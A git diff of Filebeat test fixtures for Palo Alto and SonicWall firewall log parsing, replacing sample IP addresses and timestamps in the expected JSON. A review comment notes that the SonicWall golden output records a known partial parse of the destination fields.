+ "event.original": "Nov 30 16:09:52 PA-220 1,2018/11/30 16:09:52,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:52,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:52,24266,1,39169,53,22301,53,0x400019,udp,allow,172,78,94,2,2018/11/30 16:09:19,0,any,0,32091210,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
 "event.outcome": "success",
 "event.start": "2018-11-30T16:09:19.000-02:00",
 "event.timezone": "-02:00",
@@ -10874,12 +10581,12 @@
 "fileset.name": "panos",
 "input.type": "log",
 "labels.nat_translated": true,
- "log.offset": 45488,
+ "log.offset": 46058,
 "network.application": "dns",
 "network.bytes": 172,
 "network.community_id": [
- "1:6tSek5GUc9k56LSY4NgTMd0igd8=",
- "1:PDWWOeDVqKGZ/hwjVVdCDdF6qB4="
+ "1:CdL6dWgT+IMFe6ptUk1vLlpVL20=",
+ "1:lzFOPce/GJbHM86icsI0NMzcEUg="
 ],
 "network.direction": "outbound",
 "network.packets": 2,
@@ -10896,12 +10603,12 @@
 "observer.vendor": "Palo Alto Networks",
 "panw.panos.action": "allow",
 "panw.panos.destination.interface": "ethernet1/1",
- "panw.panos.destination.nat.ip": "8.8.8.8",
+ "panw.panos.destination.nat.ip": "175.16.199.1",
 "panw.panos.destination.nat.port": 53,
 "panw.panos.destination.zone": "untrust",
 "panw.panos.endreason": "aged-out",
 "panw.panos.flow_id": "24266",
- "panw.panos.network.nat.community_id": "1:PDWWOeDVqKGZ/hwjVVdCDdF6qB4=",
+ "panw.panos.network.nat.community_id": "1:lzFOPce/GJbHM86icsI0NMzcEUg=",
 "panw.panos.ruleset": "new_outbound_from_trust",
 "panw.panos.sequence_number": 32091210,
 "panw.panos.source.interface": "ethernet1/2",
@@ -10916,14 +10623,14 @@
 "PA-220"
 ],
 "related.ip": [
+ "175.16.199.1",
 "192.168.1.63",
- "192.168.15.224",
- "8.8.8.8"
+ "192.168.15.224"
 ],
 "rule.name": "new_outbound_from_trust",
 "server.bytes": 94,
- "server.ip": "8.8.8.8",
- "server.nat.ip": "8.8.8.8",
+ "server.ip": "175.16.199.1",
+ "server.nat.ip": "175.16.199.1",
 "server.nat.port": 53,
 "server.packets": 1,
 "server.port": 53,
@@ -10948,17 +10655,18 @@
 "client.nat.port": 58124,
 "client.packets": 1,
 "client.port": 42476,
- "destination.address": "8.8.8.8",
- "destination.as.number": 15169,
- "destination.as.organization.name": "Google LLC",
+ "destination.address": "175.16.199.1",
 "destination.bytes": 166,
- "destination.geo.continent_name": "North America",
- "destination.geo.country_iso_code": "US",
- "destination.geo.country_name": "United States",
- "destination.geo.location.lat": 37.751,
- "destination.geo.location.lon": -97.822,
- "destination.ip": "8.8.8.8",
- "destination.nat.ip": "8.8.8.8",
+ "destination.geo.city_name": "Changchun",
+ "destination.geo.continent_name": "Asia",
+ "destination.geo.country_iso_code": "CN",
+ "destination.geo.country_name": "China",
+ "destination.geo.location.lat": 43.88,
+ "destination.geo.location.lon": 125.3228,
+ "destination.geo.region_iso_code": "CN-22",
+ "destination.geo.region_name": "Jilin Sheng",
+ "destination.ip": "175.16.199.1",
+ "destination.nat.ip": "175.16.199.1",
 "destination.nat.port": 53,
 "destination.packets": 1,
 "destination.port": 53,
@@ -10972,7 +10680,7 @@
 "event.end": "2018-11-30T16:09:19.000-02:00",
 "event.kind": "event",
 "event.module": "panw",
- "event.original": "Nov 30 16:09:52 PA-220 1,2018/11/30 16:09:52,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:52,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:52,24269,1,42476,53,58124,53,0x400019,udp,allow,238,72,166,2,2018/11/30 16:09:19,0,any,0,32091211,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
+ "event.original": "Nov 30 16:09:52 PA-220 1,2018/11/30 16:09:52,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:52,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:52,24269,1,42476,53,58124,53,0x400019,udp,allow,238,72,166,2,2018/11/30 16:09:19,0,any,0,32091211,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
 "event.outcome": "success",
 "event.start": "2018-11-30T16:09:19.000-02:00",
 "event.timezone": "-02:00",
@@ -10984,12 +10692,12 @@
 "fileset.name": "panos",
 "input.type": "log",
 "labels.nat_translated": true,
- "log.offset": 45936,
+ "log.offset": 46516,
 "network.application": "dns",
 "network.bytes": 238,
 "network.community_id": [
- "1:xl0u/+SYGciPtyPuv813G1aTEdI=",
- "1:yNIHAg1M08IChho9000mtg7zUOc="
+ "1:GHuJcKZG3OiYe6oybi/KhmMCXwk=",
+ "1:J9zizMWz2sU5dX8BXgKIQbfXqFU="
 ],
 "network.direction": "outbound",
 "network.packets": 2,
@@ -11006,12 +10714,12 @@
 "observer.vendor": "Palo Alto Networks",
 "panw.panos.action": "allow",
 "panw.panos.destination.interface": "ethernet1/1",
- "panw.panos.destination.nat.ip": "8.8.8.8",
+ "panw.panos.destination.nat.ip": "175.16.199.1",
 "panw.panos.destination.nat.port": 53,
 "panw.panos.destination.zone": "untrust",
 "panw.panos.endreason": "aged-out",
 "panw.panos.flow_id": "24269",
- "panw.panos.network.nat.community_id": "1:yNIHAg1M08IChho9000mtg7zUOc=",
+ "panw.panos.network.nat.community_id": "1:GHuJcKZG3OiYe6oybi/KhmMCXwk=",
 "panw.panos.ruleset": "new_outbound_from_trust",
 "panw.panos.sequence_number": 32091211,
 "panw.panos.source.interface": "ethernet1/2",
@@ -11026,14 +10734,14 @@
 "PA-220"
 ],
 "related.ip": [
+ "175.16.199.1",
 "192.168.1.63",
- "192.168.15.224",
- "8.8.8.8"
+ "192.168.15.224"
 ],
 "rule.name": "new_outbound_from_trust",
 "server.bytes": 166,
- "server.ip": "8.8.8.8",
- "server.nat.ip": "8.8.8.8",
+ "server.ip": "175.16.199.1",
+ "server.nat.ip": "175.16.199.1",
 "server.nat.port": 53,
 "server.packets": 1,
 "server.port": 53,
diff --git a/x-pack/filebeat/module/panw/panos/test/traffic_nanos_time.log-expected.json b/x-pack/filebeat/module/panw/panos/test/traffic_nanos_time.log-expected.json
index 72ffebe6db72..052e18627569 100644
--- a/x-pack/filebeat/module/panw/panos/test/traffic_nanos_time.log-expected.json
+++ b/x-pack/filebeat/module/panw/panos/test/traffic_nanos_time.log-expected.json
@@ -1,6 +1,6 @@
 [
 {
- "@timestamp": "2021-05-26T16:26:47.000Z",
+ "@timestamp": "2021-05-26T14:26:47.000-02:00",
 "client.bytes": 1696,
 "client.ip": "127.0.0.0",
 "client.nat.ip": "0.0.0.0",
@@ -21,12 +21,12 @@ ], "event.dataset": "panw.panos", "event.duration": 1000000000, - "event.end": "2021-05-26T16:26:31.000Z", + "event.end": "2021-05-26T14:26:31.000-02:00", "event.kind": "event", "event.module": "panw", "event.original": "Oct 30 09:46:42 1,2021-05-26T16:27:07.000000Z,no-serial,TRAFFIC,end,9.1,2021-05-26T16:26:47.000000Z,127.0.0.0,127.0.0.1,0.0.0.0,0.0.0.0,intrazone-default,,,web-browsing,vsys1,untrust,untrust,ethernet1/1,ethernet1/1,Cortex Data Lake,,688290,1,35834,443,35834,20077,0x1400070,tcp,allow,7291,1696,5595,21,2021-05-26T16:26:30.000000Z,1,medium-risk,,620386,0x8800000000000000,US,SG,,14,7,tcp-fin,22,18,0,0,,GP cloud service,from-policy,,,0,,0,1970-01-01T00:00:00.000000Z,N/A,0,0,0,0,6a2f6161-88f2-4afc-8dd5-256bc4505a64,0,0,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,", "event.outcome": "success", - "event.start": "2021-05-26T16:26:30.000Z", + "event.start": "2021-05-26T14:26:30.000-02:00", "event.timezone": "-02:00", "event.type": [ "allowed", diff --git a/x-pack/filebeat/module/sonicwall/firewall/test/general.log b/x-pack/filebeat/module/sonicwall/firewall/test/general.log index 41f778c72f3e..bebffc65961d 100644 --- a/x-pack/filebeat/module/sonicwall/firewall/test/general.log +++ b/x-pack/filebeat/module/sonicwall/firewall/test/general.log 
@@ -1,21 +1,21 @@ -Jan 3 13:45:36 192.168.5.1 id=firewall sn=000SERIAL time="2007-01-03 14:48:06" fw=1.1.1.1 pri=6 c=262144 m=98 msg="Connection Opened" n=23419 src=2.2.2.2:36701:WAN dst=1.1.1.1:50000:WAN proto=tcp/50000 -Jan 3 13:45:36 192.168.5.1 id=firewall sn=000SERIAL time="2007-01-03 14:48:07" fw=1.1.1.1 pri=1 c=32 m=30 msg="Administrator login denied due to bad credentials" n=7 src=2.2.2.2:36701:WAN dst=1.1.1.1:50000:WAN -Jan 3 13:45:36 192.168.5.1 id=firewall sn=000SERIAL time="2007-01-03 14:48:07" fw=1.1.1.1 pri=6 c=262144 m=98 msg="Connection Opened" n=23420 src=2.2.2.2:36702:WAN dst=1.1.1.1:50000:WAN proto=tcp/50000 -Jan 3 13:45:37 192.168.5.1 id=firewall sn=000SERIAL time="2007-01-03 14:48:07" fw=1.1.1.1 pri=6 c=1024 m=537 msg="Connection Closed" n=567996 src=192.168.4.10:27577:WAN dst=192.168.5.10:53:LAN proto=tcp/dns sent=257 rcvd=242 -Jan 3 13:45:37 192.168.5.1 id=firewall sn=000SERIAL time="2007-01-03 14:48:08" fw=1.1.1.1 pri=6 c=1024 m=537 msg="Connection Closed" n=567997 src=192.168.5.56:4277:LAN dst=192.168.1.100:1026:WAN proto=tcp/1026 sent=3590 rcvd=13042 vpnpolicy="name" -Jan 3 13:45:39 192.168.5.1 id=firewall sn=000SERIAL time="2007-01-03 14:48:10" fw=1.1.1.1 pri=6 c=1024 m=537 msg="Connection Closed" n=567999 src=192.168.5.56:4280:LAN dst=192.168.2.81:41850:WAN proto=tcp/41850 sent=386026 rcvd=454118 vpnpolicy="name" -Jan 3 13:45:39 192.168.5.1 id=firewall sn=000SERIAL time="2007-01-03 14:48:10" fw=1.1.1.1 pri=6 c=1024 m=537 msg="Connection Closed" n=567999 src=1.1.1.1:500:WAN dst=2.2.2.2:500:WAN proto=udp/500 sent=344 rcvd=152 -Jan 3 13:45:40 192.168.5.1 id=firewall sn=000SERIAL time="2007-01-03 14:48:10" fw=1.1.1.1 pri=6 c=262144 m=98 msg="Connection Opened" n=23421 src=2.2.2.2:36703:WAN dst=1.1.1.1:50000:WAN proto=tcp/50000 -Jan 3 13:45:40 192.168.5.1 id=firewall sn=000SERIAL time="2007-01-03 14:48:10" fw=1.1.1.1 pri=1 c=32 m=30 msg="Administrator login denied due to bad credentials" n=8 src=2.2.2.2:36703:WAN dst=1.1.1.1:50000:WAN -Jan 3 
13:45:40 192.168.5.1 id=firewall sn=000SERIAL time="2007-01-03 14:48:11" fw=1.1.1.1 pri=6 c=262144 m=98 msg="Connection Opened" n=23422 src=2.2.2.2:36704:WAN dst=1.1.1.1:50000:WAN proto=tcp/50000 -Jan 3 13:45:43 192.168.5.1 id=firewall sn=000SERIAL time="2007-01-03 14:48:14" fw=1.1.1.1 pri=5 c=256 m=38 msg="ICMP packet dropped" n=22070 src=219.89.19.223:1026:WAN dst=1.1.1.1:6822:WAN type=3 code=3 -Jan 3 13:45:43 192.168.5.1 id=firewall sn=000SERIAL time="2007-01-03 14:48:14" fw=1.1.1.1 pri=6 c=1024 m=537 msg="Connection Closed" n=568000 src=219.89.19.223:1026:WAN dst=1.1.1.1:0:WAN proto=udp/0 -Jan 3 13:45:44 192.168.5.1 id=firewall sn=000SERIAL time="2007-01-03 14:48:15" fw=1.1.1.1 pri=6 c=16 m=346 msg="IKE Initiator: Start Quick Mode (Phase 2)." n=171872 src=2.2.2.2:500 dst=1.1.1.1:500 -Jan 3 13:45:44 192.168.5.1 id=firewall sn=000SERIAL time="2007-01-03 14:48:15" fw=1.1.1.1 pri=6 c=262144 m=98 msg="Connection Opened" n=23423 src=1.1.1.1:500:WAN dst=2.2.2.2:500:WAN proto=udp/500 -Jan 3 13:45:44 192.168.5.1 id=firewall sn=000SERIAL time="2007-01-03 14:48:15" fw=1.1.1.1 pri=4 c=16 m=483 msg="Received notify: INVALID_ID_INFO" n=171625 src=2.2.2.2:500 dst=1.1.1.1:500 -Jan 3 13:45:45 192.168.5.1 id=firewall sn=000SERIAL time="2007-01-03 14:48:15" fw=1.1.1.1 pri=6 c=262144 m=98 msg="Connection Opened" n=23424 src=192.168.115.10:11549:WAN dst=192.168.5.10:53:LAN proto=tcp/dns -Jan 3 13:45:46 192.168.5.1 id=firewall sn=000SERIAL time="2007-01-03 14:48:17" fw=1.1.1.1 pri=6 c=262144 m=98 msg="Connection Opened" n=23425 src=192.168.5.64:3182:LAN dst=192.168.1.100:445:WAN proto=tcp/445 -Jan 3 13:45:47 192.168.5.1 id=firewall sn=000SERIAL time="2007-01-03 14:48:18" fw=1.1.1.1 pri=6 c=1024 m=537 msg="Connection Closed" n=568001 src=2.2.2.2:36699:WAN dst=1.1.1.1:50000:WAN proto=tcp/50000 sent=1557 rcvd=957 -Jan 3 13:45:49 192.168.5.1 id=firewall sn=000SERIAL time="2007-01-03 14:48:20" fw=1.1.1.1 pri=6 c=1024 m=537 msg="Connection Closed" n=568002 src=192.168.5.10:3417:LAN 
dst=192.168.1.100:53:WAN proto=udp/dns sent=401 rcvd=254 vpnpolicy="name" -Jan 3 13:45:50 192.168.5.1 id=firewall sn=000SERIAL time="2007-01-03 14:48:20" fw=1.1.1.1 pri=6 c=262144 m=98 msg="Connection Opened" n=23426 src=192.168.125.75:524:WAN dst=192.168.5.10:3582:LAN proto=udp/3582 -Jan 3 13:45:50 192.168.5.1 id=firewall sn=000SERIAL time="2007-01-03 14:48:21" fw=1.1.1.1 pri=6 c=262144 m=98 msg="Connection Opened" n=23427 src=192.168.6.10:28503:WAN dst=192.168.5.10:53:LAN proto=tcp/dns +Jan 3 13:45:36 192.168.5.1 id=firewall sn=000SERIAL time="2007-01-03 14:48:06" fw=89.160.20.156 pri=6 c=262144 m=98 msg="Connection Opened" n=23419 src=2.2.2.2:36701:WAN dst=89.160.20.156:50000:WAN proto=tcp/50000 +Jan 3 13:45:36 192.168.5.1 id=firewall sn=000SERIAL time="2007-01-03 14:48:07" fw=89.160.20.156 pri=1 c=32 m=30 msg="Administrator login denied due to bad credentials" n=7 src=2.2.2.2:36701:WAN dst=89.160.20.156:50000:WAN +Jan 3 13:45:36 192.168.5.1 id=firewall sn=000SERIAL time="2007-01-03 14:48:07" fw=89.160.20.156 pri=6 c=262144 m=98 msg="Connection Opened" n=23420 src=2.2.2.2:36702:WAN dst=89.160.20.156:50000:WAN proto=tcp/50000 +Jan 3 13:45:37 192.168.5.1 id=firewall sn=000SERIAL time="2007-01-03 14:48:07" fw=89.160.20.156 pri=6 c=1024 m=537 msg="Connection Closed" n=567996 src=192.168.4.10:27577:WAN dst=192.168.5.10:53:LAN proto=tcp/dns sent=257 rcvd=242 +Jan 3 13:45:37 192.168.5.1 id=firewall sn=000SERIAL time="2007-01-03 14:48:08" fw=89.160.20.156 pri=6 c=1024 m=537 msg="Connection Closed" n=567997 src=192.168.5.56:4277:LAN dst=192.168.1.100:1026:WAN proto=tcp/1026 sent=3590 rcvd=13042 vpnpolicy="name" +Jan 3 13:45:39 192.168.5.1 id=firewall sn=000SERIAL time="2007-01-03 14:48:10" fw=89.160.20.156 pri=6 c=1024 m=537 msg="Connection Closed" n=567999 src=192.168.5.56:4280:LAN dst=192.168.2.81:41850:WAN proto=tcp/41850 sent=386026 rcvd=454118 vpnpolicy="name" +Jan 3 13:45:39 192.168.5.1 id=firewall sn=000SERIAL time="2007-01-03 14:48:10" fw=89.160.20.156 pri=6 
c=1024 m=537 msg="Connection Closed" n=567999 src=89.160.20.156:500:WAN dst=2.2.2.2:500:WAN proto=udp/500 sent=344 rcvd=152 +Jan 3 13:45:40 192.168.5.1 id=firewall sn=000SERIAL time="2007-01-03 14:48:10" fw=89.160.20.156 pri=6 c=262144 m=98 msg="Connection Opened" n=23421 src=2.2.2.2:36703:WAN dst=89.160.20.156:50000:WAN proto=tcp/50000 +Jan 3 13:45:40 192.168.5.1 id=firewall sn=000SERIAL time="2007-01-03 14:48:10" fw=89.160.20.156 pri=1 c=32 m=30 msg="Administrator login denied due to bad credentials" n=8 src=2.2.2.2:36703:WAN dst=89.160.20.156:50000:WAN +Jan 3 13:45:40 192.168.5.1 id=firewall sn=000SERIAL time="2007-01-03 14:48:11" fw=89.160.20.156 pri=6 c=262144 m=98 msg="Connection Opened" n=23422 src=2.2.2.2:36704:WAN dst=89.160.20.156:50000:WAN proto=tcp/50000 +Jan 3 13:45:43 192.168.5.1 id=firewall sn=000SERIAL time="2007-01-03 14:48:14" fw=89.160.20.156 pri=5 c=256 m=38 msg="ICMP packet dropped" n=22070 src=219.89.19.223:1026:WAN dst=89.160.20.156:6822:WAN type=3 code=3 +Jan 3 13:45:43 192.168.5.1 id=firewall sn=000SERIAL time="2007-01-03 14:48:14" fw=89.160.20.156 pri=6 c=1024 m=537 msg="Connection Closed" n=568000 src=219.89.19.223:1026:WAN dst=89.160.20.156:0:WAN proto=udp/0 +Jan 3 13:45:44 192.168.5.1 id=firewall sn=000SERIAL time="2007-01-03 14:48:15" fw=89.160.20.156 pri=6 c=16 m=346 msg="IKE Initiator: Start Quick Mode (Phase 2)." 
n=171872 src=2.2.2.2:500 dst=89.160.20.156:500 +Jan 3 13:45:44 192.168.5.1 id=firewall sn=000SERIAL time="2007-01-03 14:48:15" fw=89.160.20.156 pri=6 c=262144 m=98 msg="Connection Opened" n=23423 src=89.160.20.156:500:WAN dst=2.2.2.2:500:WAN proto=udp/500 +Jan 3 13:45:44 192.168.5.1 id=firewall sn=000SERIAL time="2007-01-03 14:48:15" fw=89.160.20.156 pri=4 c=16 m=483 msg="Received notify: INVALID_ID_INFO" n=171625 src=2.2.2.2:500 dst=89.160.20.156:500 +Jan 3 13:45:45 192.168.5.1 id=firewall sn=000SERIAL time="2007-01-03 14:48:15" fw=89.160.20.156 pri=6 c=262144 m=98 msg="Connection Opened" n=23424 src=192.168.115.10:11549:WAN dst=192.168.5.10:53:LAN proto=tcp/dns +Jan 3 13:45:46 192.168.5.1 id=firewall sn=000SERIAL time="2007-01-03 14:48:17" fw=89.160.20.156 pri=6 c=262144 m=98 msg="Connection Opened" n=23425 src=192.168.5.64:3182:LAN dst=192.168.1.100:445:WAN proto=tcp/445 +Jan 3 13:45:47 192.168.5.1 id=firewall sn=000SERIAL time="2007-01-03 14:48:18" fw=89.160.20.156 pri=6 c=1024 m=537 msg="Connection Closed" n=568001 src=2.2.2.2:36699:WAN dst=89.160.20.156:50000:WAN proto=tcp/50000 sent=1557 rcvd=957 +Jan 3 13:45:49 192.168.5.1 id=firewall sn=000SERIAL time="2007-01-03 14:48:20" fw=89.160.20.156 pri=6 c=1024 m=537 msg="Connection Closed" n=568002 src=192.168.5.10:3417:LAN dst=192.168.1.100:53:WAN proto=udp/dns sent=401 rcvd=254 vpnpolicy="name" +Jan 3 13:45:50 192.168.5.1 id=firewall sn=000SERIAL time="2007-01-03 14:48:20" fw=89.160.20.156 pri=6 c=262144 m=98 msg="Connection Opened" n=23426 src=192.168.125.75:524:WAN dst=192.168.5.10:3582:LAN proto=udp/3582 +Jan 3 13:45:50 192.168.5.1 id=firewall sn=000SERIAL time="2007-01-03 14:48:21" fw=89.160.20.156 pri=6 c=262144 m=98 msg="Connection Opened" n=23427 src=192.168.6.10:28503:WAN dst=192.168.5.10:53:LAN proto=tcp/dns 
diff --git a/x-pack/filebeat/module/sonicwall/firewall/test/general.log-expected.json b/x-pack/filebeat/module/sonicwall/firewall/test/general.log-expected.json
index 60a16bb95489..7ea2067409d9 100644
--- a/x-pack/filebeat/module/sonicwall/firewall/test/general.log-expected.json
+++ b/x-pack/filebeat/module/sonicwall/firewall/test/general.log-expected.json
@@ -4,11 +4,11 @@
 "event.code": "98",
 "event.dataset": "sonicwall.firewall",
 "event.module": "sonicwall",
- "event.original": "Jan 3 13:45:36 192.168.5.1 id=firewall sn=000SERIAL time=\"2007-01-03 14:48:06\" fw=1.1.1.1 pri=6 c=262144 m=98 msg=\"Connection Opened\" n=23419 src=2.2.2.2:36701:WAN dst=1.1.1.1:50000:WAN proto=tcp/50000",
+ "event.original": "Jan 3 13:45:36 192.168.5.1 id=firewall sn=000SERIAL time=\"2007-01-03 14:48:06\" fw=89.160.20.156 pri=6 c=262144 m=98 msg=\"Connection Opened\" n=23419 src=2.2.2.2:36701:WAN dst=89.160.20.156:50000:WAN proto=tcp/50000",
 "fileset.name": "firewall",
 "input.type": "log",
 "log.offset": 0,
- "observer.ingress.interface.name": "WAN dst=1.1.1.1:50000:WAN proto=tcp/50000",
+ "observer.ingress.interface.name": "WAN dst=89.160.20.156:50000:WAN proto=tcp/50000",
 "observer.product": "Firewalls",
 "observer.type": "Firewall",
 "observer.vendor": "Sonicwall",
@@ -18,16 +18,9 @@
 "rsa.internal.event_desc": "Connection Opened",
 "rsa.internal.messageid": "98",
 "rsa.internal.msg": "Connection Opened",
- "rsa.network.sinterface": "WAN dst=1.1.1.1:50000:WAN proto=tcp/50000",
+ "rsa.network.sinterface": "WAN dst=89.160.20.156:50000:WAN proto=tcp/50000",
 "rsa.time.event_time": "2007-01-03T16:48:06.000Z",
 "service.type": "sonicwall",
- "source.as.number": 3215,
- "source.as.organization.name": "Orange",
- "source.geo.continent_name": "Europe",
- "source.geo.country_iso_code": "FR",
- "source.geo.country_name": "France",
- "source.geo.location.lat": 48.8582,
- "source.geo.location.lon": 2.3387,
 "source.ip": "2.2.2.2",
 "source.port": 36701,
 "tags": [
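Review bot: The regenerated golden output still pins `"observer.ingress.interface.name": "WAN dst=89.160.20.156:50000:WAN proto=tcp/50000"` (and the same value in `rsa.network.sinterface` in the second hunk here, and again in the later hunks for the n=23420, n=23421, n=23422 and n=23423 events), so the interface token is swallowing the remainder of the line and the `dst=` address and port never reach `destination.*`; the IP swap only changes which address sits in the wrong field. Several events in this file are also flagged `"log.flags": ["dissect_parsing_error"]`, including the m=30 "Administrator login denied due to bad credentials" records, which are the ones a detection keyed on destination fields would most need, and in the n=23423 hunk `related.ip` lists only the source address for the same reason. The fix presumably belongs in the sonicwall pipeline's tokenizer for the `src=IP:PORT:IFACE dst=IP:PORT:IFACE` form (outside this diff), terminating the interface token at whitespace and parsing the `dst` triple; until that lands, this fixture should be read as pinning the current partial parse rather than asserting it is correct, and a later pipeline fix is expected to change these values.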
@@ -41,13 +34,13 @@
 "event.code": "30",
 "event.dataset": "sonicwall.firewall",
 "event.module": "sonicwall",
- "event.original": "Jan 3 13:45:36 192.168.5.1 id=firewall sn=000SERIAL time=\"2007-01-03 14:48:07\" fw=1.1.1.1 pri=1 c=32 m=30 msg=\"Administrator login denied due to bad credentials\" n=7 src=2.2.2.2:36701:WAN dst=1.1.1.1:50000:WAN",
+ "event.original": "Jan 3 13:45:36 192.168.5.1 id=firewall sn=000SERIAL time=\"2007-01-03 14:48:07\" fw=89.160.20.156 pri=1 c=32 m=30 msg=\"Administrator login denied due to bad credentials\" n=7 src=2.2.2.2:36701:WAN dst=89.160.20.156:50000:WAN",
 "fileset.name": "firewall",
 "input.type": "log",
 "log.flags": [
 "dissect_parsing_error"
 ],
- "log.offset": 203,
+ "log.offset": 215,
 "observer.product": "Firewalls",
 "observer.type": "Firewall",
 "observer.vendor": "Sonicwall",
@@ -67,11 +60,11 @@
 "event.code": "98",
 "event.dataset": "sonicwall.firewall",
 "event.module": "sonicwall",
- "event.original": "Jan 3 13:45:36 192.168.5.1 id=firewall sn=000SERIAL time=\"2007-01-03 14:48:07\" fw=1.1.1.1 pri=6 c=262144 m=98 msg=\"Connection Opened\" n=23420 src=2.2.2.2:36702:WAN dst=1.1.1.1:50000:WAN proto=tcp/50000",
+ "event.original": "Jan 3 13:45:36 192.168.5.1 id=firewall sn=000SERIAL time=\"2007-01-03 14:48:07\" fw=89.160.20.156 pri=6 c=262144 m=98 msg=\"Connection Opened\" n=23420 src=2.2.2.2:36702:WAN dst=89.160.20.156:50000:WAN proto=tcp/50000",
 "fileset.name": "firewall",
 "input.type": "log",
- "log.offset": 414,
- "observer.ingress.interface.name": "WAN dst=1.1.1.1:50000:WAN proto=tcp/50000",
+ "log.offset": 438,
+ "observer.ingress.interface.name": "WAN dst=89.160.20.156:50000:WAN proto=tcp/50000",
 "observer.product": "Firewalls",
 "observer.type": "Firewall",
 "observer.vendor": "Sonicwall",
@@ -81,16 +74,9 @@
 "rsa.internal.event_desc": "Connection Opened",
 "rsa.internal.messageid": "98",
 "rsa.internal.msg": "Connection Opened",
- "rsa.network.sinterface": "WAN dst=1.1.1.1:50000:WAN proto=tcp/50000",
+ "rsa.network.sinterface": "WAN dst=89.160.20.156:50000:WAN proto=tcp/50000",
 "rsa.time.event_time": "2007-01-03T16:48:07.000Z",
 "service.type": "sonicwall",
- "source.as.number": 3215,
- "source.as.organization.name": "Orange",
- "source.geo.continent_name": "Europe",
- "source.geo.country_iso_code": "FR",
- "source.geo.country_name": "France",
- "source.geo.location.lat": 48.8582,
- "source.geo.location.lon": 2.3387,
 "source.ip": "2.2.2.2",
 "source.port": 36702,
 "tags": [
@@ -104,13 +90,13 @@
 "event.code": "537",
 "event.dataset": "sonicwall.firewall",
 "event.module": "sonicwall",
- "event.original": "Jan 3 13:45:37 192.168.5.1 id=firewall sn=000SERIAL time=\"2007-01-03 14:48:07\" fw=1.1.1.1 pri=6 c=1024 m=537 msg=\"Connection Closed\" n=567996 src=192.168.4.10:27577:WAN dst=192.168.5.10:53:LAN proto=tcp/dns sent=257 rcvd=242",
+ "event.original": "Jan 3 13:45:37 192.168.5.1 id=firewall sn=000SERIAL time=\"2007-01-03 14:48:07\" fw=89.160.20.156 pri=6 c=1024 m=537 msg=\"Connection Closed\" n=567996 src=192.168.4.10:27577:WAN dst=192.168.5.10:53:LAN proto=tcp/dns sent=257 rcvd=242",
 "fileset.name": "firewall",
 "input.type": "log",
 "log.flags": [
 "dissect_parsing_error"
 ],
- "log.offset": 617,
+ "log.offset": 653,
 "observer.product": "Firewalls",
 "observer.type": "Firewall",
 "observer.vendor": "Sonicwall",
@@ -132,13 +118,13 @@
 "event.code": "537",
 "event.dataset": "sonicwall.firewall",
 "event.module": "sonicwall",
- "event.original": "Jan 3 13:45:37 192.168.5.1 id=firewall sn=000SERIAL time=\"2007-01-03 14:48:08\" fw=1.1.1.1 pri=6 c=1024 m=537 msg=\"Connection Closed\" n=567997 src=192.168.5.56:4277:LAN dst=192.168.1.100:1026:WAN proto=tcp/1026 sent=3590 rcvd=13042 vpnpolicy=\"name\"",
+ "event.original": "Jan 3 13:45:37 192.168.5.1 id=firewall sn=000SERIAL time=\"2007-01-03 14:48:08\" fw=89.160.20.156 pri=6 c=1024 m=537 msg=\"Connection Closed\" n=567997 src=192.168.5.56:4277:LAN dst=192.168.1.100:1026:WAN proto=tcp/1026 sent=3590 rcvd=13042 vpnpolicy=\"name\"",
 "fileset.name": "firewall",
 "input.type": "log",
 "log.flags": [
 "dissect_parsing_error"
 ],
- "log.offset": 843,
+ "log.offset": 885,
 "observer.product": "Firewalls",
 "observer.type": "Firewall",
 "observer.vendor": "Sonicwall",
@@ -160,13 +146,13 @@
 "event.code": "537",
 "event.dataset": "sonicwall.firewall",
 "event.module": "sonicwall",
- "event.original": "Jan 3 13:45:39 192.168.5.1 id=firewall sn=000SERIAL time=\"2007-01-03 14:48:10\" fw=1.1.1.1 pri=6 c=1024 m=537 msg=\"Connection Closed\" n=567999 src=192.168.5.56:4280:LAN dst=192.168.2.81:41850:WAN proto=tcp/41850 sent=386026 rcvd=454118 vpnpolicy=\"name\"",
+ "event.original": "Jan 3 13:45:39 192.168.5.1 id=firewall sn=000SERIAL time=\"2007-01-03 14:48:10\" fw=89.160.20.156 pri=6 c=1024 m=537 msg=\"Connection Closed\" n=567999 src=192.168.5.56:4280:LAN dst=192.168.2.81:41850:WAN proto=tcp/41850 sent=386026 rcvd=454118 vpnpolicy=\"name\"",
 "fileset.name": "firewall",
 "input.type": "log",
 "log.flags": [
 "dissect_parsing_error"
 ],
- "log.offset": 1092,
+ "log.offset": 1140,
 "observer.product": "Firewalls",
 "observer.type": "Firewall",
 "observer.vendor": "Sonicwall",
@@ -188,13 +174,13 @@
 "event.code": "537",
 "event.dataset": "sonicwall.firewall",
 "event.module": "sonicwall",
- "event.original": "Jan 3 13:45:39 192.168.5.1 id=firewall sn=000SERIAL time=\"2007-01-03 14:48:10\" fw=1.1.1.1 pri=6 c=1024 m=537 msg=\"Connection Closed\" n=567999 src=1.1.1.1:500:WAN dst=2.2.2.2:500:WAN proto=udp/500 sent=344 rcvd=152",
+ "event.original": "Jan 3 13:45:39 192.168.5.1 id=firewall sn=000SERIAL time=\"2007-01-03 14:48:10\" fw=89.160.20.156 pri=6 c=1024 m=537 msg=\"Connection Closed\" n=567999 src=89.160.20.156:500:WAN dst=2.2.2.2:500:WAN proto=udp/500 sent=344 rcvd=152",
 "fileset.name": "firewall",
 "input.type": "log",
 "log.flags": [
 "dissect_parsing_error"
 ],
- "log.offset": 1345,
+ "log.offset": 1399,
